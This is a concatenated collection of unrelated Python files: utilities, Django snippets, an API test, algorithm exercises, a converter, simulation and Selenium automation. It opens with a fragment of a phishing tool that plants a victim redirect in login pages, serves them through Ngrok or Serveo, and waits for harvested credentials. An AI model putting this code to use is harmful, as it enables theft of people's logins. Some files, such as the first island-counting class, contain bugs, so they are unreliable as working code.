print("\n {0}[{1}*{0}]{1} TINYURL: {2}".format(CYAN, DEFAULT, GREEN) + link + "{1}".format(CYAN, DEFAULT, GREEN))
print("\n")
break
def runServer():
system("cd Server/www/ && php -S 127.0.0.1:1111 > /dev/null 2>&1 &")
if __name__ == "__main__":
try:
runPEnv()
def custom(): #Question where user can input custom web-link
print("\n (Choose Wisely As Your Victim Will Redirect to This Link)".format(RED, DEFAULT))
print("\n (Leave Blank To Loop The Phishing Page)".format(RED, DEFAULT))
print("\n {0}Insert a custom redirect url:".format(CYAN, DEFAULT))
custom = input("\nCUSTOM URL >".format(CYAN, DEFAULT))
if 'https://' in custom:
pass
else:
custom = 'https://' + custom
if path.exists('Server/www/post.php') and path.exists('Server/www/login.php'):
with open('Server/www/login.php') as f:
read_data = f.read()
c = read_data.replace('<CUSTOM>', custom)
f = open('Server/www/login.php', 'w')
f.write(c)
f.close()
with open('Server/www/post.php') as f:
read_data = f.read()
c = read_data.replace('<CUSTOM>', custom)
f = open('Server/www/post.php', 'w')
f.write(c)
f.close()
else:
with open('Server/www/login.php') as f:
read_data = f.read()
c = read_data.replace('<CUSTOM>', custom)
f = open('Server/www/login.php', 'w')
f.write(c)
f.close()
custom()
def server(): #Question where user must select server
print("\n {0}Please select any available server:{1}".format(CYAN, DEFAULT))
print("\n {0}[{1}1{0}]{1} Ngrok\n {0}[{1}2{0}]{1} Serveo".format(CYAN, DEFAULT))
choice = input(" \n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT))
if choice == '1':
runNgrok()
elif choice == '2':
runServeo()
else:
system('clear')
return server()
server()
multiprocessing.Process(target=runServer).start()
waitCreds()
except KeyboardInterrupt:
end()
exit(0)
|
11,013 | bd008781654efe92c95d914125d28fcc47b3893b | import os
from PIL import Image
import datetime
import matplotlib.pyplot as plt
def crop(image_read_dir, image_save_dir, x_ratio=0.5, y_ratio=0.54):
    """Crop the top-left portion of an image and save the result.

    Generalizes the previously hard-coded crop box: the kept region is
    the top-left ``x_ratio`` of the width by ``y_ratio`` of the height.
    Defaults reproduce the original behaviour exactly.

    Args:
        image_read_dir: path of the source image file.
        image_save_dir: path where the cropped image is written.
        x_ratio: fraction of the width to keep (default 0.5).
        y_ratio: fraction of the height to keep (default 0.54).
    """
    img = Image.open(image_read_dir)  # open the source image
    width, height = img.size
    # crop() takes (left, upper, right, lower); keep the top-left region.
    cropped = img.crop((0, 0, width * x_ratio, height * y_ratio))
    cropped.save(image_save_dir)
def main(image_read_dir, image_save_dir):
    """Crop every .png/.jpg image found in ``image_read_dir`` and write
    the result under the same name into ``image_save_dir``."""
    for (root, dirs, files) in os.walk(image_read_dir):#os.walk() walks the directory tree, top-down or bottom-up, yielding the file names in each directory.
        for file in files:
            names = os.path.splitext(file) ##os.path.splitext() splits the file name from its extension
            if names[1] == '.png' or names[1] == '.jpg': #only process image files
                crop(os.path.join(image_read_dir, file), os.path.join(image_save_dir, file))
            # NOTE(review): this break exits the file loop after the FIRST
            # entry, so at most one file is processed — confirm whether the
            # intent was to break out of os.walk (skip subdirectories)
            # instead.
            break
#os.path.join(path, name) — joins a directory and a file name (counterpart of os.path.split(path)).
if __name__ == '__main__':
    # NOTE(review): main() requires image_read_dir and image_save_dir but
    # is called with no arguments here, so running this script raises
    # TypeError — the intended paths need to be supplied.
    main()
|
11,014 | efb9d046ab89d8b8432ac7df79a2bfa2d9577cd0 | def append(xs, ys):
return xs + ys
def concat(lists):
    """Flatten one level: return a single list containing the elements of
    every iterable in ``lists``, in order."""
    flattened = []
    for chunk in lists:
        flattened.extend(chunk)
    return flattened
def filter_clone(function, xs):
    """Return the elements of ``xs`` for which ``function`` is truthy.

    Mirrors the builtin ``filter``: any truthy return value keeps the
    element.  (The previous ``is True`` identity check silently dropped
    elements whose predicate returned a truthy non-``True`` value such
    as ``1`` or a non-empty string.)
    """
    return [element for element in xs if function(element)]
def length(xs):
    """Return the number of items in the iterable ``xs``.

    Works on any iterable; note that a generator is consumed by counting.
    """
    count = 0
    for _ in xs:
        count += 1
    return count
def map_clone(function, xs):
    """Return a list of ``function`` applied to every element of ``xs``."""
    return list(map(function, xs))
def foldl(function, xs, acc):
    """Left fold: reduce ``xs`` into ``acc`` by applying
    ``function(accumulator, element)`` left to right."""
    for item in xs:
        acc = function(acc, item)
    return acc
def foldr(function, xs, acc):
    """Right fold: reduce ``xs`` into ``acc`` by applying
    ``function(element, accumulator)`` right to left."""
    for item in reversed(xs):
        acc = function(item, acc)
    return acc
def reverse(xs):
    """Return a new list with the items of ``xs`` in reverse order.

    Accepts any iterable.  Copies into a list and reverses in place,
    which is O(n); the previous ``insert(0, ...)`` loop was O(n**2)
    because every insert shifted the whole list.
    """
    result = list(xs)
    result.reverse()
    return result
11,015 | 35347c2c4b151b55b33d696661efb9228d11c3a0 | from django.conf.urls import patterns, include, url
urlpatterns = patterns('jquery_uploader.views',
url(r'^delete/(?P<file_name>.*)/$', 'delete', name='jquery_uploader_delete'),
url(r'^upload/$', 'upload', name='jquery_uploader'),
)
|
11,016 | 0fde83575143ae7d71538e9a7bf22c93c34877e1 | import requests
import json
import jsonpath
URL='https://reqres.in/api/users?page=2'
#Send the request
response=requests.get(URL)
print(response.status_code)#Fetch status code
print(response.content)#Fetch content
print(response.headers)#Fetch headers
print(response.headers.get('Content-Type'))#Fetch headers Content-Type
print(response.headers['Content-Type'])#Fetch headers Content-Type
print(response.cookies)#Fetch cookies
print(response.encoding)#Fetch encoding
print(response.history)#Fetch history
print(response.elapsed)#Fetch elapsed
assert response.status_code==200 #Assert response status code
#Convert response text format to json format
json_Formet=json.loads(response.text)
print(json_Formet)
#Validate josn response data
#json path returns List of object
page=jsonpath.jsonpath(json_Formet,'total_pages')
assert page[0] == 2
first_name=jsonpath.jsonpath(json_Formet,'data[0].first_name')
print(first_name[0])
# Get all the last_name value from the response
for i in range(0,3):
last_name = jsonpath.jsonpath(json_Formet, 'data[' +str(i)+ '].last_name')
print(last_name[0])
print(response.raw)
print(response.raw.read(10))
print(response.json())
print(response.status_code == requests.codes.ok)
print(response.raise_for_status())
print(response.url)
print(response.elapsed.total_seconds())
print(len(response.content))
|
11,017 | ab28d88690a3ce078cf8092be209b22ff4328888 | #!/usr/bin/python3
def print_matrix_integer(matrix=[[]]):
idx = 0
for row in matrix:
for val in row:
if (idx == 0):
print('{:d}'.format(val), end='')
else:
print('{:2d}'.format(val), end='')
idx += 1
idx = 0
print()
|
11,018 | a0bc4a14c8878ac5c9facc5b710452a7a0db9bff | class Solution:
    def __init__(self,row=None,col=None):
        """Hold grid dimensions; the grid itself is attached later by
        numIslands.

        NOTE(review): the names are swapped relative to their content —
        numIslands assigns the COLUMN count to ``self.row`` and the ROW
        count to ``self.col``.
        """
        self.row = row  # number of columns (x extent); see numIslands
        self.col = col  # number of rows (y extent); see numIslands
        self.mainmatrix = None  # the "1"/"0" grid, set by numIslands
def __issafe__(self,i,j):
if i < self.col or i > -1:
return False
if j < self.row or j > -1:
return False
else:
if visitedmatrix[i][j]:
return False
else:
if self.mainmatrix[i][j] == "1":
return True
def __dfs__(self,i,j,visitedmatrix):
rows = [-1,-1,-1,0,0,1,1,1]
columns = [-1,0,1,-1,1,-1,0,1]
visitedmatrix[i][j] = True
for k in range(8):
if self.__issafe__(i+rows[k],j+columns[k],visitedmatrix):
self.__dfs__(i+rows[k],j+columns[k],visitedmatrix)
def numIslands(self, grid: List[List[str]]) -> int:
y = len(grid)
x = len(grid[1])
self.row = x
self.col = y
self.mainmatrix = grid
visitedmatrix = [[False for i in range(x)]for j in range(y)]
island_count = 0
for i in range(y):
for j in range(x):
if self.mainmatrix[i][j] == "1" and visitedmatrix[i][j] == False:
print(visitedmatrix)
self.__dfs__(i,j,visitedmatrix)
print(i,j)
island_count += 1
return island_count
# Program to count islands in boolean 2D matrix
class Graph:
    """8-connected island counter over a 0/1 matrix."""

    def __init__(self, row, col, g):
        self.ROW = row    # number of rows
        self.COL = col    # number of columns
        self.graph = g    # the 0/1 matrix

    def isSafe(self, i, j, visited):
        """True when (i, j) is inside the matrix, not yet visited, and
        holds a truthy (land) value."""
        return (0 <= i < self.ROW and 0 <= j < self.COL
                and not visited[i][j] and self.graph[i][j])

    def DFS(self, i, j, visited):
        """Flood-fill from (i, j), visiting all 8-connected land cells."""
        visited[i][j] = True
        # Walk the 8 neighbours in row-major delta order, skipping self.
        for di in (-1, 0, 1):
            for dj in (-1, 0, 1):
                if di == 0 and dj == 0:
                    continue
                if self.isSafe(i + di, j + dj, visited):
                    self.DFS(i + di, j + dj, visited)

    def countIslands(self):
        """Return the number of 8-connected groups of 1-cells."""
        visited = [[False] * self.COL for _ in range(self.ROW)]
        count = 0
        for i in range(self.ROW):
            for j in range(self.COL):
                # Every unvisited land cell seeds a new island.
                if not visited[i][j] and self.graph[i][j] == 1:
                    self.DFS(i, j, visited)
                    count += 1
        return count
# Sample 5x5 grid: 1 = land, 0 = water.
graph = [[1, 1, 0, 0, 0],
         [0, 1, 0, 0, 1],
         [1, 0, 0, 1, 1],
         [0, 0, 0, 0, 0],
         [1, 0, 1, 0, 1]]

row = len(graph)
col = len(graph[0])

g = Graph(row, col, graph)
# Fixed: the original used Python 2 print statements, which are a
# SyntaxError under Python 3 — and the rest of this file already uses
# Python 3 syntax (function annotations).
print("Number of islands is:")
print(g.countIslands())
# This code is contributed by Neelam Yadav
|
11,019 | 2acb151ee81c58b983b440d02c2e90399a906c8d | from random import *
n=randint(0,100)
print(n)
p=True
while p:
m=int(input("Guess your number (1,100) ?"))
if n==m:
print("bingo")
p=False
elif n-m>10:
print("too large")
elif 10>=n-m>0:
print("a little bit large")
elif -10<n-m<0:
print("small")
else:
print("too small")
|
11,020 | 97a89a6d26402c099398408116a43f3bb2ebfdc9 | # Generated by Django 3.1.7 on 2021-03-17 15:44
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated schema migration: drops the ``default_language``
    field from the ``Platform`` model in the ``core`` app."""

    # Must be applied after the app's initial migration.
    dependencies = [
        ('core', '0001_initial'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='platform',
            name='default_language',
        ),
    ]
|
11,021 | 37b1fbbc4c7acebf2b268b1c498e18d2e53eab56 | import xmltodict
import argparse
import json
import sys
from xml.etree import ElementTree
# Help texts for the command-line interface.
description = (
    "This command convert from json data type to xml and vice versa. path_to_data is"
    " required argument it indicate path of file that should be converted.path_to_convert "
    "indicates path of file where should be saved converted data if mode is path"
)
mode = (
    "if mode is path then path_to_convert is required,"
    " converted data should be saved in path_to_convert file,"
    "if mode is print converted data should be printed in console."
)
parser = argparse.ArgumentParser(
    prog="xml-json-converter",
    description=description,
    usage="%(prog)s [-h] [-m {output,path}]" " \n\t\t\tpath_to-data [path_to_convert]",
)
parser.add_argument("path_to_data", type=str, help="path to file to be converted")
# Fix: nargs="?" makes the output path optional, matching the usage string
# above and the "-m output" mode, which prints to stdout and never reads
# path_to_convert (previously argparse rejected the documented invocation).
parser.add_argument(
    "path_to_convert", type=str, nargs="?",
    help="path to file to be saved converted data"
)
# NOTE(review): dest is the literal string "{output, path}", so the rest
# of the script reads args.__dict__["{output, path}"] — kept for
# compatibility with that code.
parser.add_argument("-m", "--mode", help=mode, dest="{output, path}")
args = parser.parse_args()
def create_xml_tree(root, data: dict):
    """Recursively mirror ``data`` under ``root`` as XML and return root.

    Every key becomes a child element; dict values recurse, anything
    else becomes the element's text via ``str``.
    """
    for key, value in data.items():
        child = ElementTree.SubElement(root, key)
        if isinstance(value, dict):
            create_xml_tree(child, value)
        else:
            child.text = str(value)
    return root
# Decide the conversion direction from the input file's extension.
file_type = args.path_to_data.split(".")[-1]
if file_type == "json":
    with open(args.path_to_data, "r") as jf:
        data = json.loads(jf.read())
    # Wrap the JSON object in a synthetic <data> root element.
    root = ElementTree.Element("data")
    create_xml_tree(root, data)
    tree = ElementTree.ElementTree(root)
    # Default mode (None) behaves like "path": write to path_to_convert.
    if (
        args.__dict__["{output, path}"] == "path"
        or args.__dict__["{output, path}"] is None
    ):
        tree.write(args.path_to_convert)
    elif args.__dict__["{output, path}"] == "output":
        sys.stdout.write(ElementTree.tostring(root).decode("utf-8"))
    else:
        raise Exception("invalid command for -m/--mode")
elif file_type == "xml":
    with open(args.path_to_data, "r") as xml_f:
        o = xmltodict.parse(xml_f.read())
    # o["data"] strips the synthetic <data> root added on the JSON->XML leg;
    # NOTE(review): XML files without a <data> root will raise KeyError here.
    if (
        args.__dict__["{output, path}"] == "path"
        or args.__dict__["{output, path}"] is None
    ):
        with open(args.path_to_convert, "w") as jf:
            jf.write(json.dumps(o["data"]))
    elif args.__dict__["{output, path}"] == "output":
        sys.stdout.write(json.dumps(o["data"]))
    else:
        raise Exception("invalid command for -m/--mode")
11,022 | 25eeef339e23828c56e315a88037090a704c52a4 | #!/usr/bin/env python
# ============================================================================
import sys
# ===========================================================================
# = http://projecteuler.net/problem=31 =
# = - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - =
# = Find the number of combinations of coins than make up 2 pounds =
# ===========================================================================
# ----------------------------------------------------------------------------
def findNumCombos(goal, denoms, master = True):
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if goal < 0:
# print '\tovershoot!'
return 0
if goal == 0:
# print '\tsolution found!'
return 1
num_combos = 0
for i, coin in enumerate(denoms):
# print '\tcoin -- %d -- next goal: %d' % (coin, goal-coin)
num_combos += findNumCombos(goal-coin, denoms[i:], False)
if master:
print 'Found %d combinations of coins that add up to %dp' % (num_combos, goal)
return num_combos
# ============================================================================
def main():
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# denoms = [200, 100, 50, 20, 10, 5, 2, 1]
denoms = [5, 2, 1]
for i in xrange(1, 5):
findNumCombos(i, denoms)
print '========================================'
denoms = [200, 100, 50, 20, 10, 5, 2, 1]
findNumCombos(200, denoms)
print '========================================'
# ============================================================================
if __name__ == "__main__":
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
sys.exit( main() )
# ============================================================================
# ============
# = solution =
# ============
#
|
11,023 | 31eb8160613163c7bfc609fd83495377b5e3121a | import random
from Names import Name as Name
import time
import bunny
class GridBunny:
    def __init__(self, sex, name, color,coords, parents = []):
        """One cell of the bunny grid; sex "U" marks an unoccupied cell.

        NOTE(review): the mutable default ``parents=[]`` is shared across
        calls; safe only as long as no caller mutates ``self.parents``.
        """
        self.sex = sex
        self.name = name
        self.color = color
        self.age = 0
        self.parents = parents
        self.coords = coords  # (x, y) position on the grid
        #print (parents)
        # A bunny's id is derived from its parents' ids; bunnies without
        # two id-carrying parents fall back to id 0.
        try:
            self.id = (parents[1].id + parents[0].id + 1)
        except:
            self.id = 0
def Grid():
grid = {}
for x in range(0,80):
for y in range(0,80):
grid[(x,y)] = GridBunny("U","","",(x,y),[])
return grid
def emptycells(self,grid):
emptycells_list = []
for i in [-1,0,1]:
for j in [-1,0,1]:
try:
if (self.coords[0]+i,self.coords[1]+j) in grid and grid[(self.coords[0]+i,self.coords[1]+j)].sex == "U": emptycells_list.append((self.coords[0]+i,self.coords[1]+j))
except Exception as e: print(str(e))
return emptycells_list
def assign(self,other,grid):
grid[self.coords].sex = other.sex
grid[self.coords].name = other.name
grid[self.coords].color = other.color
grid[self.coords].age = other.age
grid[self.coords].parents = other.parents
if other.parents!=[] : grid[self.coords].id = (other.parents[1].id + other.parents[0].id + 1)
else: grid[self.coords].id = 0
return grid
def GridMove(self,grid):
assign = GridBunny.assign
emptycells = GridBunny.emptycells
emptycell_list = grid[self.coords].emptycells(grid)
cell = (-1,-1)
if emptycell_list != [] :
try:
cell = random.choice(emptycell_list)
grid = grid[cell].assign(self,grid)
grid = grid[self.coords].move_kill(grid)
except Exception as e: print(str(e))
return (grid,cell)
def occupied_cells(grid):
emptycells_list = []
for bunnie in grid:
if grid[bunnie].sex != "U": emptycells_list.append(grid[bunnie].coords)
return emptycells_list
def Rad(self,grid):
random.seed()
if random.randint(0,100) in range(0,2):
self.sex = "X"
grid[random.choice(GridBunny.occupied_cells(grid))].sex = "X"
return grid
def bunny_pop(grid,bunnie):
for i in range(0,len(grid)-1):
try:
grid = grid[bunnie.coords].assign(GridBunny("U","","",obj.coords,[]),grid)
except Exception as e: pass
return grid
def Recreation(mal,female,grid):
random.seed(time.clock())
random.seed(random.randint(0,1000))
f,F,m,M,X="f","F","m","M","X"
male = grid[mal]
fem = grid[female]
#print("female is "+str(fem)+"and male is "+str(male))
color = fem.color
if fem :
#print("female exists")
emptycells = GridBunny.emptycells
cells_2b = fem.emptycells(grid)
if cells_2b != []:
#print("cells exist")
cell = random.choice(cells_2b)
random.seed(random.randint(0,1000))
sex = random.choice(["m","f"])
if cell:
#print("single cell acquired")
child = GridBunny(sex,Name.name(sex),color,cell,[fem,male])
#print("child born: "+str(child))
grid = child.Rad(grid)
grid = grid[cell].assign(child,grid)
return grid
def kill(self,grid):
return GridBunny.bunny_pop(grid,self)
def move_kill(self,grid):
return GridBunny.bunny_pop(grid,self)
def tick(self,grid):
try:
i+=1
except Exception as e:
i=random.randint(0,100)
random.seed(i)
kill = GridBunny.kill
if self.sex != "U" :
#grid[self.coords].age += 1
self.age+=1
moved = self.GridMove(grid)
if not moved[1] == (-1,-1):
grid = moved[0]
self.coords = moved[1]
len_g = len(GridBunny.occupied_cells(grid))
try:
if len_g > 1000 :
for i in range(0,int(len_g/2)):
GridBunny.bunny_pop(grid,random.choice(GridBunny.occupied_cells(grid)))
except Exception as e: print(str(e))
if self.sex != "X" and self.sex != "U":
if self.age >= 2 :
self.sex = self.sex.upper()
#grid[self.coords].sex = grid[self.coords].sex.upper()
if grid[self.coords].age > 10 : self = GridBunny("U","","",self.coords,[])
elif self.sex == "X":
if self.age > 50:
self = GridBunny("U","","",self.coords,[])
grid = grid[self.coords].assign(self,grid)
return grid
|
11,024 | c4fdc5acbc5b0765d4d3013a177a3140d5c2231d | from django.test import TestCase
from ..models import (
HomeBanner,
homebanner_image_upload_to,
homebanner_video_upload_to,)
class HomeBannerTestCase(TestCase):
    """Checks that the upload_to helpers build date-stamped banner paths."""

    def test_image_upload_to(self):
        # the original filename is irrelevant; the stored name is image.jpeg
        banner = HomeBanner.objects.create()
        expected = 'homebanners/{:%Y-%m-%d}/image.jpeg'.format(banner.created)
        self.assertEqual(homebanner_image_upload_to(banner, 'whatever.png'), expected)

    def test_video_upload_to(self):
        # the stored name is always video.webm under the creation date
        banner = HomeBanner.objects.create()
        expected = 'homebanners/{:%Y-%m-%d}/video.webm'.format(banner.created)
        self.assertEqual(homebanner_video_upload_to(banner, 'whatever.webm'), expected)
|
11,025 | 1fa09118f800de3d56fffb177beb91ef1ba71461 | import xlrd
import xlwt
# Extract the first ten passenger names from the Titanic workbook and copy
# them into a new spreadsheet (PassengerNames.xls).
# NOTE(review): the input path is hard-coded to one machine -- confirm before reuse.
wb = xlrd.open_workbook("C:\\Users\\ABRIDGE0\\Desktop\\DAY2\\titanic3.xls") # open source workbook
print(wb.nsheets) # number of sheets
print(wb.sheet_names()) # sheet names
ws = wb.sheet_by_name('titanic3') # open the data sheet
print(ws.nrows) # number of rows
print(ws.ncols) # number of columns
wb=xlwt.Workbook();
syf=wb.add_sheet("SYF");
syf.write(0,0,"Passenger Name")
# column 2 holds the passenger name; copy the first 10 rows into the new sheet
for x in range(10):
    print(ws.cell(x,2).value)
    syf.write(x+1,0,ws.cell(x,2).value)
wb.save("PassengerNames.xls")
|
11,026 | 5b0ebd583c11cb4f7cec630be7bbcd9e296daa15 | from .utils import *
class Project(object):
    """Drives an iterative Abaqus workflow: for each iteration, writes the
    model geometry to JSON, runs the pre/post Abaqus scripts, reads the
    result JSON back and derives the next iteration's point list."""

    # json_path = "E:/AbaqusDir/auto/output"
    # abaqus_dir = "E:/AbaqusDir/sym-40/abaqus-files"
    # NOTE(review): machine-specific paths below -- confirm per installation.
    abaqus_exe_path = "C:/SIMULIA/Abaqus/6.14-2/code/bin/abq6142.exe"
    script_path = "E:/AbaqusDir/auto/abaqus_api"
    pre_script_name = "pre.py"
    post_script_name = "post.py"

    def __init__(self, project_name, json_path, abaqus_dir, iter_times=10, step_factor=0.25, enable_rand=False):
        """Set up the runner.

        project_name -- prefix for all generated file/model names
        json_path    -- directory for the intermediate/result JSON files
        abaqus_dir   -- Abaqus working directory
        iter_times   -- number of optimisation iterations to run
        step_factor  -- step size passed to Iteration
        enable_rand  -- forwarded to Iteration (randomised steps)
        """
        self.project_name = project_name
        self.json_path = json_path
        self.abaqus_dir = abaqus_dir
        self.enable_rand = enable_rand
        self.abaqus_env = RunAbaqus(
            abaqus_exe_path=self.abaqus_exe_path,
            abaqus_dir=abaqus_dir,
            script_path=self.script_path,
            pre_script=self.pre_script_name,
            post_script=self.post_script_name
        )
        self.iter_times = iter_times
        self.step_factor = step_factor

    def run(self, pt_list):
        """Run the full iteration loop starting from `pt_list`.

        Each pass writes two JSON stages, invokes Abaqus pre/post scripts,
        then reads res_<name>.json and asks Iteration for the next points.
        """
        # NOTE: loop variable `time` shadows any `time` module imported
        # via utils -- intentional here? confirm.
        for time in range(self.iter_times):
            print("time:%d" % time, "pt_list=\n", pt_list)
            plain = InitPlain(pt_list)
            # plain.plot_xy()
            plain.save_fig("%s-%d" % (self.project_name, time), self.json_path)
            res_file_prefix = "res_"
            tmp_1st_name = "%s-1st-%d.json" % (self.project_name, time)
            tmp_2nd_name = "%s-2nd-%d.json" % (self.project_name, time)
            d_1st = plain.to_json(file_name=tmp_1st_name, save_path=self.json_path)
            abq_name = "%s-%d" % (self.project_name, time)
            # second-stage JSON adds the physical model parameters;
            # the returned dict d_2nd is not used further here
            d_2nd = GenerateAbaqusData.to_json(
                d_in=d_1st,
                json_file_name=tmp_2nd_name,
                res_file_prefix=res_file_prefix,
                json_save_dir=self.json_path,
                abaqus_dir=self.abaqus_dir,
                mdb_name=abq_name,
                odb_name=abq_name,
                iter_time=time,
                left_hang=10,
                left_hang_height=5,
                right_hang=30,
                right_hang_height=5,
                radius=0.02,
                thickness=0.003,
                elastic_modular=26E+09,
                density=1850,
                deformation_step_name="Step-1",
            )
            # run the Abaqus model build and the result extraction scripts
            self.abaqus_env.pre_process(self.json_path, tmp_2nd_name)
            self.abaqus_env.post_process(self.json_path, tmp_2nd_name)
            res_file_name = res_file_prefix + abq_name + ".json"
            with open(self.json_path + "/" + res_file_name, "r") as f:
                d = json.load(f)
            print("bound_stderr=", d['bound_stderr'])
            # factor = self.step_factor * random() + 0.05
            factor = self.step_factor
            # `iter` shadows the builtin; kept to preserve original code
            iter = Iteration(d, factor=factor, enable_rand=self.enable_rand)
            pt_list = iter.get_new_points()
if __name__ == '__main__':
    # placeholder: this module is driven from elsewhere, not run directly
    pass
|
11,027 | aa486b8eee026319ba25c3b3af9afb51f74119ea | from seed import *
from log import logger
import time
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import Select
class User:
    """Selenium automation of automationpractice.com: builds a user
    profile, registers an account, buys a blouse and checks out."""

    def __init__(self, driver, title=None,
                 fname=None, lname=None, email=None,
                 password=None, dob=None, company=None, address=None,
                 city=None, postalcode=None, phone=None):
        """Store the automation wrapper (`driver`) and the profile fields."""
        logger.info('Starting user profile')
        self.automation = driver
        self.title = title
        self.fname = fname
        self.lname = lname
        self.email = email
        self.password = password
        self.dob = dob
        self.company = company
        self.address = address
        self.city = city
        self.postalcode = postalcode
        self.phone = phone
        logger.info('Ending user profile')

    def set_user_info(self, usrs):
        """
        set user profile info using random user of users list
        :return:
        """
        logger.info('Starting set user profile info')
        user = choice(usrs)
        self.title = user['title']
        self.fname = user['fname']
        self.lname = user['lname']
        self.email = user['email']
        self.password = user['password']
        self.dob = user['dob']
        self.company = user['company']
        self.address = user['address']
        self.city = user['city']
        self.postalcode = user['postalcode']
        self.phone = user['phone']
        logger.info('Ending set user profile info')

    def __repr__(self):
        """Multi-line dump of the profile fields."""
        # BUG FIX: the original was missing the newline between city and
        # postalcode, fusing the two fields onto one line
        return f'fname: {self.fname} \nlastname: {self.lname}\n' \
               f'email: {self.email}\npassword: {self.password}\n' \
               f'dob: {self.dob}\ncompany: {self.company}\naddress: {self.address}\ncity: {self.city}\n' \
               f'postalcode: {self.postalcode}\nphone: {self.phone}'

    def create_account(self):
        """
        create new user account using user profile info
        :return: True if login else False
        """
        logger.info('*' * 20 + ' Starting creating user account ' + '*' * 20)
        logger.info(f'\nfor user {self}')
        self.automation.wait.until(EC.presence_of_element_located((By.ID, 'email_create')))
        self.automation.driver.find_element_by_css_selector("#email_create").send_keys(self.email)  # send email
        self.automation.driver.find_element_by_css_selector("#SubmitCreate").click()  # 'create an account' btn
        # ##############################################
        # 1- mr. or mrs. ?
        logger.info(f'Choose title {self.title}')
        self.automation.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '#account-creation_form div.account_creation div.clearfix')))
        if self.title == 'mr.':
            gender_selector = "input#id_gender1"
        else:
            gender_selector = "input#id_gender2"
        self.automation.driver.find_element_by_css_selector(gender_selector).click()
        self.automation.driver.execute_script("window.scrollTo(0, document.body.scrollHeight - 2000)")  # scroll down
        # ##############################################
        logger.info(f'adding fname {self.fname}')
        # 2- first name
        self.automation.driver.find_element_by_css_selector("#customer_firstname").send_keys(self.fname)
        # ##############################################
        logger.info(f'adding lname {self.lname}')
        # 3- last name
        self.automation.driver.find_element_by_css_selector("#customer_lastname").send_keys(self.lname)
        # ##############################################
        logger.info(f'adding email {self.email}')
        # 4- email
        email_elem = self.automation.driver.find_element_by_css_selector("#email")
        email = email_elem.get_attribute('value')
        if not email:  # check email is passed or not ?
            logger.info('email was not added , add it again ')
            # BUG FIX: the original called send_keys on the string `email`
            # (always empty here); the element is what receives the keys
            email_elem.send_keys(self.email)
        # ##############################################
        logger.info(f'adding password')
        # 5- password
        password = f'document.getElementById("passwd").value="{self.password}";'  # js code to change password elm value
        self.automation.driver.execute_script(password)
        self.automation.driver.execute_script("window.scrollTo(0, document.body.scrollHeight - 1000)")  # scroll down
        # ##############################################
        # 6- date of birth year-month-day
        logger.info(f'adding dob {self.dob}')
        self.select_dob()
        # ##############################################
        logger.info(f'adding fname#2 {self.fname}')
        # 7- fname
        get_fname = 'return document.querySelectorAll("div.account_creation #firstname")[0].value;'
        fname = self.automation.driver.execute_script(get_fname)
        if not fname:  # check fname is passed or not ?
            fname = f'document.querySelectorAll("div.account_creation #firstname")[0].value="{self.fname}";'
            self.automation.driver.execute_script(fname)
        # ##############################################
        logger.info(f'adding lname#2 {self.lname}')
        # 8- last name
        get_lname = 'return document.querySelectorAll("div.account_creation #lastname")[0].value;'
        lname = self.automation.driver.execute_script(get_lname)
        if not lname:  # check lname is passed or not ?
            lname = f'document.querySelectorAll("div.account_creation #lastname")[0].value="{self.lname}";'
            self.automation.driver.execute_script(lname)
        # ##############################################
        # 9- complete profile ( company, city, address, mobile, postalcode, alias address)
        logger.info('complete profile with ( company, city, address, mobile, postalcode, alias address)')
        logger.info(f'company({self.company}) , city({self.city}) , address({self.address}), mobile({self.phone}) , postalcode({self.postalcode}) , alias address({self.address[0] + self.address[-1]})')
        self.complete_profile()
        # ##############################################
        # 10- state (randomly choice)
        logger.info('choose state randomly')
        states = [state.text for state in self.automation.driver.find_elements_by_css_selector('#id_state option')]
        Select(self.automation.driver.find_element_by_css_selector('#id_state')).select_by_visible_text(choice(states))
        # ###############################################
        self.automation.driver.execute_script("window.scrollTo(0, document.body.scrollHeight - 700)")  # scroll down
        self.automation.driver.find_element_by_css_selector('#submitAccount').click()  # register btn
        # ################ wait to login ###############################
        account_lst = self.automation.driver.find_elements_by_css_selector('.myaccount-link-list')
        timer = 1
        is_login = True
        while not account_lst:
            # poll for the account menu; give up after ~60 polls
            if timer == 60:
                is_login = False
                break
            time.sleep(.3)
            account_lst = self.automation.driver.find_elements_by_css_selector('.myaccount-link-list')
            timer += 1
        return is_login

    def complete_profile(self):
        """Fill the remaining address-form fields via injected JS."""
        elements = [
            {'element': 'company', 'elem_id': 'company', 'elem_value': self.company},
            {'element': 'address', 'elem_id': 'address1', 'elem_value': self.address},
            {'element': 'city', 'elem_id': 'city', 'elem_value': self.city},
            {'element': 'postalcode', 'elem_id': 'postcode', 'elem_value': self.postalcode},
            {'element': 'mobile', 'elem_id': 'phone_mobile', 'elem_value': self.phone},
            {'element': 'alias address', 'elem_id': 'alias', 'elem_value': self.address[0] + self.address[-1]},
        ]
        for element in elements:
            elem_id = element['elem_id']
            value = element['elem_value']
            elm_value = f'document.getElementById("{elem_id}").value="{value}";'
            self.automation.driver.execute_script(elm_value)

    def select_dob(self):
        """Select day/month/year dropdowns from self.dob ('YYYY-MM-DD')."""
        dob = self.dob.split('-')
        year = dob[0]
        month = dob[1]
        day = dob[-1]
        if day[0] == '0':  # example : remove 0 ==> 03 to 3
            day = day[1:]
        if month[0] == '0':  # example : remove 0 ==> 05 to 5
            month = month[1:]
        dob_elems = {
            'days': day,
            'months': month,
            'years': year,
        }
        for elm_id, value in dob_elems.items():
            select = Select(self.automation.driver.find_element_by_id(elm_id))
            # select by visible value
            select.select_by_value(value)

    def choose_blouses_item(self):
        """
        choose blouses item and idd to cart
        Select “Blouses” Subcategory in “Women” Category & checkout procedure
        :return:
        """
        self.automation.driver.get('http://automationpractice.com/index.php?id_category=7&controller=category')
        logger.info(f'You Moved to "{self.automation.driver.title}"')
        self.automation.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, 'div.product-image-container a.product_img_link')))
        logger.info('Click on Product')
        # click on product
        self.automation.driver.execute_script("document.querySelectorAll('div.product-image-container "
                                              "a.product_img_link')[0].click()")
        # time.sleep(2)
